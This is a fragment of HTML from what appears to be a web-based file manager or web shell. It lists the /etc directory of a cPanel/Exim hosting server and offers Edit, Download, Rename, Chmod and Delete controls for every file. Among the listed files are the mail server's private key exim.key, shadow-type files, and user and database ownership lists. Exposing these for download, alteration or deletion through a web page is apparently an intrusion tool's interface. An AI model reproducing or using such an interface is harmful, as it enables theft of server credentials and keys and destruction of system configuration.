                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpanelsync.exclude" class="file-link">📄 cpanelsync.exclude</a></td>
                            <td class="size">1.1 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-07 01:18</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpanelsync.exclude" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcpanelsync.exclude" class="action-button">Download</a>
                                <button onclick="showRename('/etc/cpanelsync.exclude','cpanelsync.exclude')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cpanelsync.exclude','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cpanelsync.exclude',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cpbackup-exclude.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpbackup-exclude.conf" class="file-link">📄 cpbackup-exclude.conf</a></td>
                            <td class="size">138 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpbackup-exclude.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcpbackup-exclude.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/cpbackup-exclude.conf','cpbackup-exclude.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cpbackup-exclude.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cpbackup-exclude.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cpbackup.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpbackup.conf" class="file-link">📄 cpbackup.conf</a></td>
                            <td class="size">406 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 05:30</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpbackup.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcpbackup.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/cpbackup.conf','cpbackup.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cpbackup.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cpbackup.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cpbackup.conf.cache">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpbackup.conf.cache" class="file-link">📄 cpbackup.conf.cache</a></td>
                            <td class="size">503 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 05:36</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpbackup.conf.cache" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcpbackup.conf.cache" class="action-button">Download</a>
                                <button onclick="showRename('/etc/cpbackup.conf.cache','cpbackup.conf.cache')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cpbackup.conf.cache','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cpbackup.conf.cache',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cpsources.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpsources.conf" class="file-link">📄 cpsources.conf</a></td>
                            <td class="size">34 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 07:04</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpsources.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcpsources.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/cpsources.conf','cpsources.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cpsources.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cpsources.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cpsources.conf.plugins.example">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpsources.conf.plugins.example" class="file-link">📄 cpsources.conf.plugins.example</a></td>
                            <td class="size">2.8 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-17 22:06</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpsources.conf.plugins.example" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcpsources.conf.plugins.example" class="action-button">Download</a>
                                <button onclick="showRename('/etc/cpsources.conf.plugins.example','cpsources.conf.plugins.example')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cpsources.conf.plugins.example','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cpsources.conf.plugins.example',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cpspamd.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpspamd.conf" class="file-link">📄 cpspamd.conf</a></td>
                            <td class="size">45 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-07 01:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpspamd.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcpspamd.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/cpspamd.conf','cpspamd.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cpspamd.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cpspamd.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cpupdate.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpupdate.conf" class="file-link">📄 cpupdate.conf</a></td>
                            <td class="size">111 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-11 23:20</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpupdate.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcpupdate.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/cpupdate.conf','cpupdate.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cpupdate.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cpupdate.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cron.deny">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcron.deny" class="file-link">📄 cron.deny</a></td>
                            <td class="size">7 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 07:06</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcron.deny" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcron.deny" class="action-button">Download</a>
                                <button onclick="showRename('/etc/cron.deny','cron.deny')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cron.deny','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cron.deny',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="crontab">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcrontab" class="file-link">📄 crontab</a></td>
                            <td class="size">451 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2022-04-11 19:54</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcrontab" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcrontab" class="action-button">Download</a>
                                <button onclick="showRename('/etc/crontab','crontab')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/crontab','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/crontab',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="csh.cshrc">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcsh.cshrc" class="file-link">📄 csh.cshrc</a></td>
                            <td class="size">1.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-04-03 18:29</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcsh.cshrc" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcsh.cshrc" class="action-button">Download</a>
                                <button onclick="showRename('/etc/csh.cshrc','csh.cshrc')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/csh.cshrc','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/csh.cshrc',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="csh.login">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcsh.login" class="file-link">📄 csh.login</a></td>
                            <td class="size">1.1 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-04-03 18:29</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcsh.login" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcsh.login" class="action-button">Download</a>
                                <button onclick="showRename('/etc/csh.login','csh.login')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/csh.login','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/csh.login',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="dbowners">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdbowners" class="file-link">📄 dbowners</a></td>
                            <td class="size">16.0 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdbowners" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fdbowners" class="action-button">Download</a>
                                <button onclick="showRename('/etc/dbowners','dbowners')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/dbowners','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/dbowners',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="demodomains">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdemodomains" class="file-link">📄 demodomains</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdemodomains" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fdemodomains" class="action-button">Download</a>
                                <button onclick="showRename('/etc/demodomains','demodomains')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/demodomains','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/demodomains',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="demouids">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdemouids" class="file-link">📄 demouids</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdemouids" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fdemouids" class="action-button">Download</a>
                                <button onclick="showRename('/etc/demouids','demouids')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/demouids','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/demouids',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="demousers">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdemousers" class="file-link">📄 demousers</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdemousers" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fdemousers" class="action-button">Download</a>
                                <button onclick="showRename('/etc/demousers','demousers')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/demousers','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/demousers',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="digestshadow">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdigestshadow" class="file-link">📄 digestshadow</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 07:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdigestshadow" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fdigestshadow" class="action-button">Download</a>
                                <button onclick="showRename('/etc/digestshadow','digestshadow')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/digestshadow','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/digestshadow',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="domain_remote_mx_ips.cdb">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdomain_remote_mx_ips.cdb" class="file-link">📄 domain_remote_mx_ips.cdb</a></td>
                            <td class="size">48.8 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-19 17:42</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdomain_remote_mx_ips.cdb" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fdomain_remote_mx_ips.cdb" class="action-button">Download</a>
                                <button onclick="showRename('/etc/domain_remote_mx_ips.cdb','domain_remote_mx_ips.cdb')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/domain_remote_mx_ips.cdb','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/domain_remote_mx_ips.cdb',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="domainips">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdomainips" class="file-link">📄 domainips</a></td>
                            <td class="size">15 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-18 03:56</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdomainips" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fdomainips" class="action-button">Download</a>
                                <button onclick="showRename('/etc/domainips','domainips')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/domainips','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/domainips',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="domainusers">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdomainusers" class="file-link">📄 domainusers</a></td>
                            <td class="size">35.4 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdomainusers" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fdomainusers" class="action-button">Download</a>
                                <button onclick="showRename('/etc/domainusers','domainusers')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/domainusers','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/domainusers',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="dracut.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdracut.conf" class="file-link">📄 dracut.conf</a></td>
                            <td class="size">117 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-14 00:41</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fdracut.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fdracut.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/dracut.conf','dracut.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/dracut.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/dracut.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="eig_exim_system_filter">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Feig_exim_system_filter" class="file-link">📄 eig_exim_system_filter</a></td>
                            <td class="size">5.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Feig_exim_system_filter" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Feig_exim_system_filter" class="action-button">Download</a>
                                <button onclick="showRename('/etc/eig_exim_system_filter','eig_exim_system_filter')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/eig_exim_system_filter','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/eig_exim_system_filter',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="email_send_limits">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Femail_send_limits" class="file-link">📄 email_send_limits</a></td>
                            <td class="size">109.0 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Femail_send_limits" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Femail_send_limits" class="action-button">Download</a>
                                <button onclick="showRename('/etc/email_send_limits','email_send_limits')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/email_send_limits','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/email_send_limits',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="environment">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fenvironment" class="file-link">📄 environment</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-04-03 18:29</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fenvironment" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fenvironment" class="action-button">Download</a>
                                <button onclick="showRename('/etc/environment','environment')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/environment','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/environment',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ethertypes">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fethertypes" class="file-link">📄 ethertypes</a></td>
                            <td class="size">1.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2020-06-23 06:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fethertypes" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fethertypes" class="action-button">Download</a>
                                <button onclick="showRename('/etc/ethertypes','ethertypes')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ethertypes','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ethertypes',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf" class="file-link">📄 exim.conf</a></td>
                            <td class="size">88.2 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-18 03:37</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim.conf','exim.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim.conf.dist">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf.dist" class="file-link">📄 exim.conf.dist</a></td>
                            <td class="size">25.8 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-07-24 13:18</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf.dist" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim.conf.dist" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim.conf.dist','exim.conf.dist')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim.conf.dist','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim.conf.dist',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim.conf.local">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf.local" class="file-link">📄 exim.conf.local</a></td>
                            <td class="size">4.8 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 17:51</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf.local" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim.conf.local" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim.conf.local','exim.conf.local')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim.conf.local','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim.conf.local',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim.conf.localopts">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf.localopts" class="file-link">📄 exim.conf.localopts</a></td>
                            <td class="size">1.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-18 03:37</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf.localopts" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim.conf.localopts" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim.conf.localopts','exim.conf.localopts')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim.conf.localopts','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim.conf.localopts',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim.conf.localopts.shadow">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf.localopts.shadow" class="file-link">📄 exim.conf.localopts.shadow</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2025-09-01 07:06</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf.localopts.shadow" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim.conf.localopts.shadow" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim.conf.localopts.shadow','exim.conf.localopts.shadow')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim.conf.localopts.shadow','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim.conf.localopts.shadow',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim.conf.mailman2.dist">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf.mailman2.dist" class="file-link">📄 exim.conf.mailman2.dist</a></td>
                            <td class="size">29.0 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-07-24 13:18</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf.mailman2.dist" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim.conf.mailman2.dist" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim.conf.mailman2.dist','exim.conf.mailman2.dist')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim.conf.mailman2.dist','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim.conf.mailman2.dist',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim.conf.mailman2.exiscan.dist">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf.mailman2.exiscan.dist" class="file-link">📄 exim.conf.mailman2.exiscan.dist</a></td>
                            <td class="size">29.2 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-07-24 13:18</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.conf.mailman2.exiscan.dist" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim.conf.mailman2.exiscan.dist" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim.conf.mailman2.exiscan.dist','exim.conf.mailman2.exiscan.dist')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim.conf.mailman2.exiscan.dist','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim.conf.mailman2.exiscan.dist',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim.crt">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.crt" class="file-link">📄 exim.crt</a></td>
                            <td class="size">6.8 KB</td>
                            <td><span class="permissions">0660</span></td>
                            <td>2026-05-29 17:20</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.crt" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim.crt" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim.crt','exim.crt')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim.crt','0660')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim.crt',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim.key">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.key" class="file-link">📄 exim.key</a></td>
                            <td class="size">1.7 KB</td>
                            <td><span class="permissions">0660</span></td>
                            <td>2026-05-29 17:20</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.key" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim.key" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim.key','exim.key')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim.key','0660')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim.key',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim.pl">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.pl" class="file-link">📄 exim.pl</a></td>
                            <td class="size">231 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-07-24 13:18</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.pl" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim.pl" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim.pl','exim.pl')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim.pl','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim.pl',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim.pl.local">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.pl.local" class="file-link">📄 exim.pl.local</a></td>
                            <td class="size">501.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-18 03:37</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim.pl.local" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim.pl.local" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim.pl.local','exim.pl.local')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim.pl.local','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim.pl.local',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim_excludereceiver_mailchannels">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim_excludereceiver_mailchannels" class="file-link">📄 exim_excludereceiver_mailchannels</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim_excludereceiver_mailchannels" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim_excludereceiver_mailchannels" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim_excludereceiver_mailchannels','exim_excludereceiver_mailchannels')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim_excludereceiver_mailchannels','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim_excludereceiver_mailchannels',this)" class="action-button action-button-red">Delete</button>
